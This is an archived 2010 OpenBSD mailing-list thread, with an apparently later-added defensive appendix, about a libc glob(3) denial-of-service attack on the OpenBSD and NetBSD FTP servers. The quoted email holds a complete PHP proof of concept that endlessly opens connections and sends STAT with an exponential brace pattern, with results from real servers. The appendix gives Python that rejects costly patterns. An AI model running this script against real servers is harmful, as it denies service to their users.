I know how to google for nmap!! Can I be a security expert too??? Pretty please! :)

- paid professional paranoid

On 7/2/10, Bob Beck <[email protected]> wrote:
> It's rather astonishing what attempts to pass for a credible security
> advisory today.
>
> "oh, I made a lot of connections to the site and they blocked me."
>
> Thank you, Maksymilian, for showing us all that you can execute a
> denial of service attack from 90.156.82.13.
>
> I wonder how many connections his site supports to his services. perhaps
> some similar "security expert" can test his connection rate and let us all know.
>
> # traceroute -n 90.156.82.13
> traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets
>  1  129.128.5.2     6.906 ms    0.818 ms    1.444 ms
>  2  129.128.3.194   0.306 ms    0.303 ms    0.306 ms
>  3  129.128.3.130   0.345 ms    0.502 ms    0.656 ms
>  4  129.128.3.170   0.502 ms    0.726 ms    1.443 ms
>  5  64.42.209.114   5.628 ms    5.562 ms    5.272 ms
>  6  216.18.32.13    6.337 ms    5.676 ms    5.752 ms
>  7  66.59.190.198  18.936 ms   19.18 ms    18.523 ms
>  8  66.59.190.18   18.384 ms   18.659 ms   18.426 ms
>  9  67.69.199.105  17.797 ms   17.785 ms   18.111 ms
> 10  64.86.115.13   17.369 ms   17.651 ms   17.175 ms
> 11  216.6.98.29    68.828 ms   69.162 ms   69.146 ms
> 12  216.6.57.9     87.943 ms   87.828 ms   87.879 ms
> 13  195.219.69.29  175.930 ms  176.47 ms   175.804 ms
> 14  195.219.69.2   189.366 ms  176.757 ms  179.460 ms
> 15  195.219.180.6  193.562 ms  197.755 ms  197.880 ms
> 16  195.219.246.2  181.461 ms  201.536 ms  179.635 ms
> 17  83.238.251.56  177.432 ms  177.971 ms  177.115 ms
> 18  83.238.250.38  189.741 ms  190.70 ms   189.646 ms
> 19  83.238.250.12  191.123 ms  193.99 ms   192.135 ms
> 20  83.238.251.41  189.843 ms  189.805 ms  189.245 ms
> 21  87.204.248.202 188.981 ms  189.167 ms  459.987 ms
> 22  87.99.33.90    190.739 ms  190.637 ms  190.955 ms
> 23  87.99.32.202   190.180 ms  190.271 ms  190.160 ms
> 24  90.156.82.13   289.39 ms   331.276 ms  319.419 ms
> ^C
> # host 90.156.82.13
> 13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
> #
>
>
>
>
> On 2 July 2010 15:47, Theo de Raadt <[email protected]> wrote:
>> OK, I am letting the maintainer of the site know, at the University Campus
>> that you have just executed a denial of service against.
>>
>> I am surprised that you would go out of your way to declare so freely
>> that you have purposely participated in a denial of service.
>>
>>> Return-Path: [email protected]
>>> Delivery-Date: Fri Jul  2 15:38:24 2010
>>> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
>>>         by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
>>>         (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256
>>>         verify=FAIL)
>>>         for <[email protected]>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
>>> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
>>>         by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
>>>         for <[email protected]>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
>>> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO
>>>         [127.0.0.1])
>>>         by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer
>>>         v0.70)
>>>         id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
>>> Message-ID: <[email protected]>
>>> Date: Fri, 02 Jul 2010 22:38:24 +0200
>>> From: Maksymilian Arciemowicz <[email protected]>
>>> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) Gecko/20100512 Thunderbird/3.0.5
>>> MIME-Version: 1.0
>>> To: [email protected], [email protected]
>>> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
>>> X-Enigmail-Version: 1.0.1
>>> Content-Type: text/plain; charset=ISO-8859-1
>>> Content-Transfer-Encoding: 7bit
>>>
>>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA1
>>>
>>> <?php
>>>
>>> /* Libc/glob(3) denial-of-service
>>> Maksymilian Arciemowicz from SecurityReason.com
>>>
>>> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org
>>>
>>> Result (ftp.openbsd.org):
>>> - - Connection refused
>>>
>>> and in the end
>>>
>>> # telnet ftp.openbsd.org 21
>>> Trying 129.128.5.191...
>>> Connected to ftp.openbsd.org.
>>> Escape character is '^]'.
>>> 421- If you are seeing this message you have been blocked from using
>>> 421- this ftp server - most likely for mirroring content without paying
>>> 421- attention to what you were mirroring or where you should be mirroring
>>> 421- it from, or for excessive connection rates.
>>> 421- OpenBSD should *NOT* be mirrored from here, you should use
>>> 421- a second level mirror as described in http://www.openbsd.org/ftp.html
>>> 421
>>>
>>> Connection closed by foreign host.
>>> #
>>>
>>> ;]
>>>
>>> Result (ftp.netbsd.org):
>>> - - no more access for anonymous
>>>
>>> On 02.07.2010 20:29 CET, ftp.netbsd.org has returned:
>>> 530 User ftp access denied, connection limit of 160 reached.
>>>
>>>
>>> After attack from one host
>>>
>>> */
>>>
>>> $conf['host']= $argv[1] ? $argv[1] : "HOST";
>>> $conf['user'] =$argv[2] ? $argv[2] : "anonymous";
>>> $conf['pass'] =$argv[3] ? $argv[3] : "[email protected]";
>>> $conf['port']= $argv[4] ? $argv[4] : 21;
>>>
>>> $dirnames=array('A', 'B', 'C', 'D',
>>> 'E','F','G','H','I','J','K','M','N','O','P');
>>>
>>> $pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx";
>>>
>>> // fts_levelsumary
>>> $fts_level=2;
>>>
>>> $created_directories=true;
>>>
>>> function attackglobinftp(){
>>>     global $conf;
>>>     global $dirnames;
>>>     global $pathsent;
>>>     global $fts_level;
>>>     global $created_directories;
>>>
>>>     if (isset($conf['port']) and
>>>         ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and
>>>         (socket_connect($socket, $conf['host'], $conf['port']))){
>>>
>>>         echo "New connection opened\n";
>>>         socket_write($socket, "USER ".$conf['user']."\nPASS ".$conf['pass']."\n");
>>>
>>>         if(!$created_directories)
>>>             for($stagc=0;$stagc < count($dirnames);$stagc++){
>>>                 for($ssdc=2;$ssdc--;){
>>>                     socket_write($socket, "MKD ".$dirnames[$stagc]."\nCWD ".$dirnames[$stagc]."\n");
>>>                     echo "MKD ".$dirnames[$stagc]."\nCWD ".$dirnames[$stagc]." for \n";
>>>                     echo socket_read($socket,10204);
>>>                     echo $ssdc."\n";
>>>                 }
>>>                 for($ssdc=256;$ssdc--;){
>>>                     socket_write($socket, "cwd ..\n");
>>>                     echo socket_read($socket,10000);
>>>                 }
>>>             }
>>>         $created_directories=true;
>>>
>>>
>>>         for($aoi=1; $aoi--;
>>>         ){
>>>             socket_write($socket, "STAT ".$pathsent."\n");
>>>             echo "sent: STAT ".$pathsent."s\n";
>>>         }
>>>         sleep(5);
>>>     } else
>>>         echo "Unable to connect\n";
>>>
>>> }
>>>
>>> while(1)
>>>     attackglobinftp();
>>> ?>
>>>
>>>
>>> - --
>>> Best Regards,
>>> - ------------------------
>>> pub   1024D/A6986BD6 2008-08-22
>>> uid   Maksymilian Arciemowicz (cxib)
>>>       <[email protected]>
>>> sub   4096g/0889FA9A 2008-08-22
>>>
>>> http://securityreason.com
>>> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
>>> -----BEGIN PGP SIGNATURE-----
>>>
>>> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS
>>> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p
>>> =lx/r
>>> -----END PGP SIGNATURE-----
>
>

--
Sent from my mobile device
http://www.glumbert.com/media/shift
http://www.youtube.com/watch?v=tGvHNNOLnCk

"This officer's men seem to follow him merely out of idle curiosity."
-- Sandhurst officer cadet evaluation.

"Securing an environment of Windows platforms from abuse - external or internal - is akin to trying to install sprinklers in a fireworks factory where smoking on the job is permitted."
-- Gene Spafford

learn french: http://www.youtube.com/watch?v=30v_g83VHK4
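The two responses quoted in the thread, the 421 banner for "excessive connection rates" and NetBSD's "530 ... connection limit of 160 reached", are the defences that actually stopped this: per-client rate limiting and a hard cap on concurrent sessions. A cheaper third layer is to bound the work a single pattern can cause before the server ever calls glob(3), which is what a GLOB_LIMIT-style cap inside the library does at run time. The Python below is an added example written for this page, not code from the thread, from OpenBSD or from NetBSD ftpd: it estimates the cost of an FTP STAT/LIST argument by multiplying the sizes of its `{a,b,...}` groups and counting the path components that force a directory read, then rejects anything above a threshold. The function names `brace_expansion_count`, `wildcard_segments` and `glob_request_allowed`, the two limits, and the `POC_PATTERN` constant (reconstructed from the quoted `$pathsent` value purely to measure it) are all assumptions of this example.

```python
"""Pre-check for glob arguments received over FTP (added example, not ftpd code).

Estimates how many paths a pattern expands to and how many directory walks it
forces, so a server can refuse pathological patterns before calling glob(3).
"""


def _matching_brace(pattern: str, start: int) -> int:
    """Index of the '}' closing the '{' at pattern[start], or -1 if unbalanced."""
    depth = 0
    for j in range(start, len(pattern)):
        if pattern[j] == "{":
            depth += 1
        elif pattern[j] == "}":
            depth -= 1
            if depth == 0:
                return j
    return -1


def _top_level_alternatives(inner: str) -> list:
    """Split a brace body on commas that are not inside a nested group."""
    alts, depth, start = [], 0, 0
    for k, c in enumerate(inner):
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
        elif c == "," and depth == 0:
            alts.append(inner[start:k])
            start = k + 1
    alts.append(inner[start:])
    return alts


def brace_expansion_count(pattern: str) -> int:
    """Number of strings the {a,b,...} groups expand to; nesting supported.

    Groups multiply ("{a,b}/{c,d}" -> 4) and identical alternatives still
    count separately, exactly as glob(3) expands them. An unbalanced '{' is
    treated as a literal character.
    """
    total, i = 1, 0
    while i < len(pattern):
        if pattern[i] == "{":
            j = _matching_brace(pattern, i)
            if j == -1:
                i += 1
                continue
            alts = _top_level_alternatives(pattern[i + 1:j])
            total *= sum(brace_expansion_count(a) for a in alts)
            i = j + 1
        else:
            i += 1
    return total


def wildcard_segments(pattern: str) -> int:
    """Count path components containing '*', '?' or '[', each of which makes
    glob(3) read a directory for every expansion that reaches it."""
    return sum(1 for seg in pattern.split("/") if any(c in seg for c in "*?["))


# Assumed limits for illustration; a real server would tune them to its tree.
MAX_EXPANSIONS = 64
MAX_WILDCARD_SEGMENTS = 2


def glob_request_allowed(pattern: str,
                         max_expansions: int = MAX_EXPANSIONS,
                         max_wildcards: int = MAX_WILDCARD_SEGMENTS) -> bool:
    """True only if the pattern is cheap enough to hand to glob(3)."""
    return (brace_expansion_count(pattern) <= max_expansions
            and wildcard_segments(pattern) <= max_wildcards)


# The STAT argument from the quoted PoC, reconstructed here only to measure it:
# eleven {..,..,..} groups, each followed by a '*' component.
POC_PATTERN = "{..,..,..}/*/" * 10 + "{..,..,..}/*cx"

if __name__ == "__main__":
    print("PoC brace expansions:", brace_expansion_count(POC_PATTERN))   # 177147
    print("PoC wildcard segments:", wildcard_segments(POC_PATTERN))      # 11
    print("PoC allowed:", glob_request_allowed(POC_PATTERN))             # False
    print("mirror listing allowed:",
          glob_request_allowed("pub/OpenBSD/*.tgz"))                     # True
```

The estimator is static: it bounds the number of expansions (3^11 = 177147 for the quoted pattern) and the number of directory reads per expansion, not the number of files that actually match, so it complements rather than replaces a run-time limit inside glob(3) and the connection-rate and session caps the two servers already applied.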

